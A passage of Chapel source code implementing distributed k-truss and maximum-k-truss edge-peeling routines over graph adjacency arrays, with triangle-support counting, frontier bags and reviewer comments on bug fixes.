    // seed the frontier: provisionally remove (1-k) every under-supported edge
    coforall loc in Locales with (ref SetCurF ) {
      on loc {
        var ld = src.localSubdomain();
        var startEdge = ld.low;
        var endEdge = ld.high;
        // each locale only handles the edges owned by itself
        forall i in startEdge..endEdge with(ref SetCurF){
          if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
            EdgeDeleted[i] = 1-k;
            SetCurF.add(i);
          }
        }
      }// end of on loc
    } // end of coforall loc in Locales
    ConFlag=false;
    // we try to remove as many edges as possible in the following code
    var tmpN2=0:int;
    while (SetCurF.getSize()>0) {
      //first we build the edge set that will be affected by the removed edges in SetCurF
      coforall loc in Locales with ( ref SetNextF) {
        on loc {
          var ld = src.localSubdomain();
          var startEdge = ld.low;
          var endEdge = ld.high;
          forall i in SetCurF with (ref SetNextF) {
            if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
              var v1=src[i];
              var v2=dst[i];
              var dv1=nei[v1];
              var dv2=nei[v2];
              {
                // triangles that used removed edge i via v1's out-edges
                var nextStart=start_i[v1];
                var nextEnd=start_i[v1]+nei[v1]-1;
                if (nei[v1]>1) {
                  forall j in nextStart..nextEnd with (ref SetNextF){
                    var v3=src[j];//v3==v1
                    var v4=dst[j];
                    var tmpe:int;
                    if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
                      tmpe=findEdge(v2,v4);
                      if (tmpe!=-1) {// there is such third edge
                        if ( EdgeDeleted[tmpe]<=-1 ) {
                          // decrement only edges not already queued; the
                          // (i<...) guards break ties between concurrent removals
                          if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
                            TriCount[tmpe].sub(1);
                            if TriCount[tmpe].read() <k-2 {
                              SetNextF.add((i,tmpe));
                            }
                            TriCount[j].sub(1);
                            if TriCount[j].read() <k-2 {
                              SetNextF.add((i,j));
                            }
                          } else {
                            //if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
                            if ((EdgeDeleted[j]==-1) ) {
                              TriCount[j].sub(1);
                              if TriCount[j].read() <k-2 {
                                SetNextF.add((i,j));
                              }
                            } else {
                              if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
                                TriCount[tmpe].sub(1);
                                if TriCount[tmpe].read()<k-2 {
                                  SetNextF.add((i,tmpe));
                                  //EdgeDeleted[tmpe]=1-k;
                                }
                              }
                            }
                          }
                        }
                      }
                    }// end of if EdgeDeleted[j]<=-1
                  }// end of forall j in nextStart..nextEnd
                }// end of if nei[v1]>1
                // triangles that used removed edge i via v2's out-edges
                // (cycle case v1->v2->v4->v1, hence exactEdge)
                nextStart=start_i[v2];
                nextEnd=start_i[v2]+nei[v2]-1;
                if (nei[v2]>0) {
                  forall j in nextStart..nextEnd with (ref SetNextF){
                    var v3=src[j];//v3==v2
                    var v4=dst[j];
                    var tmpe:int;
                    if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
                      tmpe=exactEdge(v4,v1);
                      if (tmpe!=-1) {// there is such third edge
                        if ( EdgeDeleted[tmpe]<=-1 ) {
                          if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
                            TriCount[tmpe].sub(1);
                            if TriCount[tmpe].read() <k-2 {
                              SetNextF.add((i,tmpe));
                            }
                            TriCount[j].sub(1);
                            if TriCount[j].read() <k-2 {
                              SetNextF.add((i,j));
                            }
                          } else {
                            if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
                              TriCount[j].sub(1);
                              if TriCount[j].read() <k-2 {
                                SetNextF.add((i,j));
                              }
                            } else {
                              if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
                                TriCount[tmpe].sub(1);
                                if TriCount[tmpe].read() <k-2 {
                                  SetNextF.add((i,tmpe));
                                }
                              }
                            }
                          }
                        }
                      }
                    }
                  }// end of forall j in nextStart..nextEnd
                }// end of if
                // triangles where i was the closing edge, recorded in EReverse
                if EReverse[i].size>0 {
                  forall (e1,e2) in EReverse[i] {
                    if ((EdgeDeleted[e1]==-1) && (EdgeDeleted[e2]==-1)) {
                      TriCount[e1].sub(1);
                      if TriCount[e1].read() <k-2 {
                        SetNextF.add((i,e1));
                      }
                      TriCount[e2].sub(1);
                      if TriCount[e2].read() <k-2 {
                        SetNextF.add((i,e2));
                      }
                    }
                  }
                }
              }
            } // end if (xlocal(i,startEdge,endEdge)
          } // end forall i in SetCurF with (ref SetNextF)
        } //end on loc
      } //end coforall loc in Locales
      // finalize this wave: provisional (1-k) marks become permanent (k-1)
      coforall loc in Locales with (ref SetCurF ) {
        on loc {
          var ld = src.localSubdomain();
          var startEdge = ld.low;
          var endEdge = ld.high;
          forall i in SetCurF {
            if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
              EdgeDeleted[i]=k-1;
            }
          }
        }
      }
      SetCurF.clear();
      // promote the next frontier: provisionally remove affected edges
      coforall loc in Locales with (ref SetNextF ) {
        on loc {
          var ld = src.localSubdomain();
          var startEdge = ld.low;
          var endEdge = ld.high;
          // NOTE(review): rset is declared and named in the forall intent
          // but never used — dead local.
          var rset = new set((int,int), parSafe = true);
          forall (i,j) in SetNextF with(ref rset) {
            if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
              EdgeDeleted[j]=1-k;
              SetCurF.add(j);
            }
          }// end of forall
        }
      }
      SetNextF.clear();
      tmpN2+=1;
    }// end of while
    N2+=1;
  }// end while
  timer.stop();
  // Count survivors and report statistics.
  AllRemoved=true;
  var tmpi=0;
  for i in 0..Ne-1 {
    if (EdgeDeleted[i]==-1) {
      AllRemoved=false;
    } else {
      tmpi+=1;
    }
  }
  outMsg="After KTruss Directed,Given K="+k:string;
  smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
  outMsg="After KTruss Directed,Total execution time="+(timer.elapsed()):string;
  smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
  outMsg="After KTruss Directed,Total number of iterations ="+N2:string;
  smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
  outMsg="After KTruss Directed,Totally remove "+tmpi:string+ " Edges";
  smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
  // Publish the EdgeDeleted array through the symbol table.
  var countName = st.nextName();
  var countEntry = new shared SymEntry(EdgeDeleted);
  st.addEntry(countName, countEntry);
  var cntMsg = 'created ' + st.attrib(countName);
  return cntMsg;
} // end of proc KTrussDirected
// end of KTruss serial
//Begin of Max KTruss Serial
proc SkMaxTrussNaive(kInput:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
    neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):bool{
  // Naive checker for the max-k-truss search: decides whether the
  // k-truss (k = kInput) of the graph is empty under the trial deletion
  // array lEdgeDeleted (captured from the enclosing scope; -1 = alive).
  // Each pass recounts every live edge's triangle support from scratch
  // (scanning from the lower-total-degree endpoint, using both forward
  // nei/start_i/src/dst and reversed neiR/start_iR/srcR/dstR adjacency),
  // then deletes edges with support < k-2, until a fixed point.
  // Returns true iff every edge ends up deleted.
  var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
  var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
  var N2=0:int;
  var k=kInput:int;
  var ConFlag=true:bool;
  var RemovedEdge=0: int;
  var timer:Timer;

  // Given vertices u and v, return the edge ID of <u,v> or <v,u>, or -1.
  proc findEdge(u:int,v:int):int {
    if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
      return -1;
      // we do not accept self-loop
    }
    var beginE=start_i[u];
    var eid=-1:int;
    if (nei[u]>0) {
      if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
        // search <u,v> among u's out-edges
        eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
      }
    }
    if (eid==-1) {
      // fall back to the reversed direction <v,u>
      beginE=start_i[v];
      if (nei[v]>0) {
        if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
          eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
        }
      }
    }
    return eid;
  }// end of proc findEdge(u:int,v:int)

  timer.start();
  //we will try to remove all the unnecessary edges in the graph
  while (ConFlag) {
    // ---- recount the triangle support of every edge ----
    coforall loc in Locales with (ref SetCurF ) {
      on loc {
        var ld = src.localSubdomain();
        var startEdge = ld.low;
        var endEdge = ld.high;
        // each locale only handles the edges owned by itself
        forall i in startEdge..endEdge with(ref SetCurF){
          TriCount[i]=0;
          var uadj = new set(int, parSafe = true);
          var vadj = new set(int, parSafe = true);
          var u = src[i];
          var v = dst[i];
          var du=nei[u]+neiR[u];
          var dv=nei[v]+neiR[v];
          if ( du<=dv ) {
            // enumerate u's neighbours through both edge directions
            var beginTmp=start_i[u];
            var endTmp=beginTmp+nei[u]-1;
            if ((lEdgeDeleted[i]==-1) && (u!=v) ){
              if ( (nei[u]>0) ){
                forall x in dst[beginTmp..endTmp] with (ref uadj) {
                  var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
                  if (e!=-1){
                    if ((lEdgeDeleted[e] ==-1) && (x !=v)) {
                      uadj.add(x);
                    }
                  }
                }
              }
              beginTmp=start_iR[u];
              endTmp=beginTmp+neiR[u]-1;
              if ((neiR[u]>0) ){
                forall x in dstR[beginTmp..endTmp] with (ref uadj) {
                  var e=findEdge(x,u);
                  if (e!=-1){
                    if ((lEdgeDeleted[e] ==-1) && (x !=v)) {
                      uadj.add(x);
                    }
                  }
                }
              }
              if (! uadj.isEmpty() ){
                var Count=0:int;
                forall s in uadj with ( + reduce Count) {
                  var e=findEdge(s,v);
                  if ( (e!=-1) && (e!=i) ) {
                    // BUGFIX: test the trial array lEdgeDeleted, not the
                    // global EdgeDeleted (the symmetric branch below and
                    // every other test in this proc use lEdgeDeleted).
                    if ( lEdgeDeleted[e]==-1) {
                      Count +=1;
                    }
                  }
                }
                TriCount[i] = Count;
                // here we get the number of triangles of edge ID i
              }// end of if
            }//end of if
          } else {
            // symmetric case: enumerate v's neighbours instead
            var beginTmp=start_i[v];
            var endTmp=beginTmp+nei[v]-1;
            // BUGFIX: was EdgeDeleted[i]; use the trial array lEdgeDeleted
            // like the (du<=dv) branch above.
            if ((lEdgeDeleted[i]==-1) && (u!=v) ){
              if ( (nei[v]>0) ){
                forall x in dst[beginTmp..endTmp] with (ref vadj) {
                  var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
                  if (e!=-1){
                    // BUGFIX: exclude the other endpoint u (was x!=v),
                    // matching the reverse-neighbour loop below.
                    if ((lEdgeDeleted[e] ==-1) && (x !=u)) {
                      vadj.add(x);
                    }
                  }
                }
              }
              beginTmp=start_iR[v];
              endTmp=beginTmp+neiR[v]-1;
              if ((neiR[v]>0) ){
                forall x in dstR[beginTmp..endTmp] with (ref vadj) {
                  var e=findEdge(x,v);
                  if (e!=-1){
                    if ((lEdgeDeleted[e] ==-1) && (x !=u)) {
                      vadj.add(x);
                    }
                  }
                }
              }
              if (! vadj.isEmpty() ){
                var Count=0:int;
                forall s in vadj with ( + reduce Count) {
                  var e=findEdge(s,u);
                  if ( (e!=-1) && (e!=i) ) {
                    if ( lEdgeDeleted[e]==-1 ) {
                      Count +=1;
                    }
                  }
                }
                TriCount[i] = Count;
                // here we get the number of triangles of edge ID i
              }// end of if
            }//end of if
          }
        }// end of forall. We get the number of triangles for each edge
      }// end of on loc
    } // end of coforall loc in Locales
    // ---- delete every live edge whose support fell below k-2 ----
    coforall loc in Locales with (ref SetCurF ) {
      on loc {
        var ld = src.localSubdomain();
        var startEdge = ld.low;
        var endEdge = ld.high;
        // each locale only handles the edges owned by itself
        forall i in startEdge..endEdge with(ref SetCurF){
          if ((lEdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
            lEdgeDeleted[i] = k-1;
            SetCurF.add(i);
          }
        }
      }// end of on loc
    } // end of coforall loc in Locales
    if ( SetCurF.getSize()<=0){
      ConFlag=false;
    }
    SetCurF.clear();
    N2+=1;
  }// end while
  // Normalize any provisional 1-k marks to the final k-1 value.
  coforall loc in Locales with (ref SetCurF ) {
    on loc {
      var ld = src.localSubdomain();
      var startEdge = ld.low;
      var endEdge = ld.high;
      forall i in startEdge..endEdge {
        if (lEdgeDeleted[i]==1-k) {
          lEdgeDeleted[i] = k-1;
        }
      }
    }// end of on loc
  } // end of coforall loc in Locales
  // The k-truss is empty iff no edge is still alive.
  var tmpi=0;
  while tmpi<Ne {
    if (lEdgeDeleted[tmpi]==-1) {
      return false;
    } else {
      tmpi+=1;
    }
  }
  return true;
} // end of proc SKMaxTrussNaive
//For undirected graph.
proc SkMaxTruss(kInput:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
    neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,
    TriCount:[?D5] atomic int, lEdgeDeleted:[?D6] int ):bool{
  // Incremental checker for the max-k-truss search (undirected graph).
  // Given precomputed atomic triangle counts TriCount and a trial
  // deletion array lEdgeDeleted (-1 = alive, 1-k = provisionally removed,
  // k-1 = removed), it deletes every edge with support < k-2 and
  // propagates each removal to the other two edges of the triangles it
  // participated in, via the SetCurF/SetNextF frontiers.
  // Returns true iff every edge ends up deleted for k = kInput.
  var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
  var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
  var N2=0:int;
  var k=kInput:int;
  var ConFlag=true:bool;
  var RemovedEdge=0: int;
  var timer:Timer;
  // given vertices u and v, return the edge ID e=<u,v> or e=<v,u>
  proc findEdge(u:int,v:int):int {
    //given the destination array, the edge range [l,h], return the edge ID e where ary[e]=key
    if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
      return -1;
      // we do not accept self-loop
    }
    var beginE=start_i[u];
    var eid=-1:int;
    if (nei[u]>0) {
      if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
        eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
        // search <u,v> in undirect edges
      }
    }
    if (eid==-1) {// if b
      beginE=start_i[v];
      if (nei[v]>0) {
        if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
          eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
          // search <v,u> in undirect edges
        }
      }
    }// end of if b
    return eid;
  }// end of proc findEdge(u:int,v:int)
  // given vertices u and v, return the edge ID e=<u,v> (exact direction only)
  proc exactEdge(u:int,v:int):int {
    //given the destination array, the edge range [l,h], return the edge ID e where ary[e]=key
    if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
      return -1;
      // we do not accept self-loop
    }
    var beginE=start_i[u];
    var eid=-1:int;
    if (nei[u]>0) {
      if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
        eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
        // search <u,v> in undirect edges
      }
    }
    return eid;
  }// end of proc exatEdge(u:int,v:int)
  //here we begin the truss version
  timer.start();
  // NOTE(review): this is a plain block, not a loop, despite the
  // "end while" comment on its closing brace — it runs once.
  {
    // seed the frontier: provisionally remove (1-k) under-supported edges
    coforall loc in Locales with (ref SetCurF ) {
      on loc {
        var ld = src.localSubdomain();
        var startEdge = ld.low;
        var endEdge = ld.high;
        // each locale only handles the edges owned by itself
        forall i in startEdge..endEdge with(ref SetCurF){
          if ((lEdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
            lEdgeDeleted[i] = 1-k;
            SetCurF.add(i);
          }
        }
      }// end of on loc
    } // end of coforall loc in Locales
    // NOTE(review): ConFlag is forced false right after this conditional,
    // making the conditional redundant.
    if ( SetCurF.getSize()<=0){
      ConFlag=false;
    }
    ConFlag=false;
    // we try to remove as many edges as possible in the following code
    var tmpN2=0:int;
    while (SetCurF.getSize()>0) {
      //first we build the edge set that will be affected by the removed edges in SetCurF
      coforall loc in Locales with ( ref SetNextF) {
        on loc {
          var ld = src.localSubdomain();
          var startEdge = ld.low;
          var endEdge = ld.high;
          forall i in SetCurF with (ref SetNextF) {
            if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
              var v1=src[i];
              var v2=dst[i];
              var dv1=nei[v1]+neiR[v1];
              var dv2=nei[v2]+neiR[v2];
              var sv1:int;
              var lv2:int;
              var sdv1:int;
              var ldv2:int;
              // scan from the endpoint with the smaller total degree:
              // sv1 = small-degree endpoint, lv2 = the other one
              if (dv1<=dv2) {
                sv1=v1;
                lv2=v2;
                sdv1=dv1;
                ldv2=dv2;
              } else {
                sv1=v2;
                lv2=v1;
                sdv1=dv2;
                ldv2=dv1;
              }
              {
                // triangles that used removed edge i via sv1's out-edges
                var nextStart=start_i[sv1];
                var nextEnd=start_i[sv1]+nei[sv1]-1;
                if (nei[sv1]>1) {
                  forall j in nextStart..nextEnd with (ref SetNextF){
                    var v3=src[j];//v3==sv1
                    var v4=dst[j];
                    var tmpe:int;
                    if ( (lEdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
                      // look up the closing edge from the lower-degree side
                      var dv4=nei[v4]+neiR[v4];
                      if (ldv2<dv4) {
                        tmpe=findEdge(lv2,v4);
                      } else {
                        tmpe=findEdge(v4,lv2);
                      }
                      if (tmpe!=-1) {// there is such third edge
                        if ( lEdgeDeleted[tmpe]<=-1 ) {
                          // decrement only edges not already queued; the
                          // (i<...) guards break ties between concurrent removals
                          if ((lEdgeDeleted[j]==-1) && (lEdgeDeleted[tmpe]==-1)) {
                            TriCount[tmpe].sub(1);
                            if TriCount[tmpe].read() <k-2 {
                              SetNextF.add((i,tmpe));
                            }
                            TriCount[j].sub(1);
                            if TriCount[j].read() <k-2 {
                              SetNextF.add((i,j));
                            }
                          } else {
                            if ((lEdgeDeleted[j]==-1) && (i<tmpe)) {
                              TriCount[j].sub(1);
                              if TriCount[j].read() <k-2 {
                                SetNextF.add((i,j));
                              }
                            } else {
                              if ((lEdgeDeleted[tmpe]==-1) &&(i<j)) {
                                TriCount[tmpe].sub(1);
                                if TriCount[tmpe].read() <k-2 {
                                  SetNextF.add((i,tmpe));
                                }
                              }
                            }
                          }
                        }
                      }
                    }// end of if lEdgeDeleted[j]<=-1
                  }// end of forall j in nextStart..nextEnd
                }// end of if nei[v1]>1
                // triangles that used removed edge i via sv1's in-edges
                nextStart=start_iR[sv1];
                nextEnd=start_iR[sv1]+neiR[sv1]-1;
                if (neiR[sv1]>0) {
                  forall j in nextStart..nextEnd with (ref SetNextF){
                    var v3=srcR[j];//sv1==v3
                    var v4=dstR[j];
                    var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
                    var tmpe:int;
                    if (e1!=-1) {
                      if ( (lEdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
                        // we first check if the two different vertices can be the third edge
                        var dv4=nei[v4]+neiR[v4];
                        if ldv2<dv4 {
                          tmpe=findEdge(lv2,v4);
                        } else {
                          tmpe=findEdge(v4,lv2);
                        }
                        if (tmpe!=-1) {// there is such third edge
                          if ( lEdgeDeleted[tmpe]<=-1 ) {
                            if ( (lEdgeDeleted[e1]==-1) && (lEdgeDeleted[tmpe]==-1) ) {
                              TriCount[tmpe].sub(1);
                              if TriCount[tmpe].read() <k-2 {
                                SetNextF.add((i,tmpe));
                              }
                              TriCount[e1].sub(1);
                              if TriCount[e1].read() <k-2 {
                                SetNextF.add((i,e1));
                              }
                            } else {
                              if ((lEdgeDeleted[e1]==-1) && (i<tmpe)) {
                                TriCount[e1].sub(1);
                                if TriCount[e1].read() <k-2 {
                                  SetNextF.add((i,e1));
                                }
                              } else {
                                if ((lEdgeDeleted[tmpe]==-1) &&(i<e1)) {
                                  TriCount[tmpe].sub(1);
                                  if TriCount[tmpe].read() <k-2 {
                                    SetNextF.add((i,tmpe));
                                  }
                                }
                              }
                            }
                          }
                        }
                      }
                    }
                  }// end of forall j in nextStart..nextEnd
                }// end of if
              }// end of affected edge search
            } // end if (xlocal(i,startEdge,endEdge)
          } // end forall i in SetCurF with (ref SetNextF)
        } //end on loc
      } //end coforall loc in Locales
      // finalize this wave: provisional (1-k) marks become permanent (k-1)
      coforall loc in Locales with (ref SetCurF ) {
        on loc {
          var ld = src.localSubdomain();
          var startEdge = ld.low;
          var endEdge = ld.high;
          forall i in SetCurF {
            if (xlocal(i,startEdge,endEdge) && (lEdgeDeleted[i]==1-k)) {//each local only check the owned edges
              lEdgeDeleted[i]=k-1;
            }
          }
        }
      }
      SetCurF.clear();
      // then we try to remove the affected edges: only those whose count
      // actually dropped below k-2 join the next frontier
      coforall loc in Locales {
        on loc {
          var ld = src.localSubdomain();
          var startEdge = ld.low;
          var endEdge = ld.high;
          forall (i,j) in SetNextF {
            if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
              if (lEdgeDeleted[j]==-1) {
                if (TriCount[j].read()<k-2) {
                  lEdgeDeleted[j]=1-k;
                  SetCurF.add(j);
                }
              }
            }
          }// end of forall
        } //end on loc
      } //end coforall loc in Locales
      tmpN2+=1;
      //RemovedEdge+=SetCurF.getSize();
      //SetCurF<=>SetNextF;
      SetNextF.clear();
    }// end of while (!SetCurF.isEmpty())
    N2+=1;
  }// end while
  // Normalize any remaining provisional 1-k marks to the final k-1 value.
  coforall loc in Locales with (ref SetCurF ) {
    on loc {
      var ld = src.localSubdomain();
      var startEdge = ld.low;
      var endEdge = ld.high;
      forall i in startEdge..endEdge {
        if (lEdgeDeleted[i]==1-k) {
          lEdgeDeleted[i] = k-1;
        }
      }
    }// end of on loc
  } // end of coforall loc in Locales
  // The k-truss is empty iff no edge is still alive.
  var tmpi=0;
  while tmpi<Ne {
    if (lEdgeDeleted[tmpi]==-1) {
      return false;
    } else {
      tmpi+=1;
    }
  }
  return true;
} // end of proc SkMaxTruss
//For undirected graph.
proc SkMaxTrussMix(kInput:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,
TriCount:[?D5] atomic int,lEdgeDeleted:[?D6] int):bool{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var k=kInput:int;
var ConFlag=true:bool;
var RemovedEdge=0: int;
var timer:Timer;
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((lEdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
lEdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
//while (!SetCurF.isEmpty()) {
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (lEdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
//v1->v2, v1->v4
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( lEdgeDeleted[tmpe]<=-1 ) {
if ((lEdgeDeleted[j]==-1) && (lEdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}// end of if lEdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (lEdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
// cycle case v1->v2->v4->v1
if (tmpe!=-1) {// there is such third edge
if ( lEdgeDeleted[tmpe]<=-1 ) {
if ((lEdgeDeleted[j]==-1) && (lEdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((lEdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
//check the case of x->v1 and x->v2
nextStart=start_iR[v1];
nextEnd=start_iR[v1]+neiR[v1]-1;
var dv1=neiR[v1];
var dv2=neiR[v2];
if ((dv1<=dv2) && (dv1>0)) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v1
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (lEdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v2);
if (tmpe!=-1) {
if (lEdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
} else {
if (dv2>0) {
nextStart=start_iR[v2];
nextEnd=start_iR[v2]+neiR[v2]-1;
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=srcR[j];//v3==v2
var v4=dstR[j];
var e2=exactEdge(v4,v3);
if (lEdgeDeleted[e2]==-1) {
var tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {
if (lEdgeDeleted[tmpe]==-1) {
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (lEdgeDeleted[i]==1-k)) {//each local only check the owned edges
lEdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
// then we try to remove the affected edges
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
var rset = new set((int,int), parSafe = true);
forall (i,j) in SetNextF with(ref rset) {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
if (lEdgeDeleted[j]==-1) {
rset.add((i,j));
}
}
}// end of forall
for (i,j) in rset {
if (lEdgeDeleted[j]==-1) {
TriCount[j].sub(1);
if (TriCount[j].read()<k-2) {
lEdgeDeleted[j]=1-k;
SetCurF.add(j);
}
}
}
} //end on loc
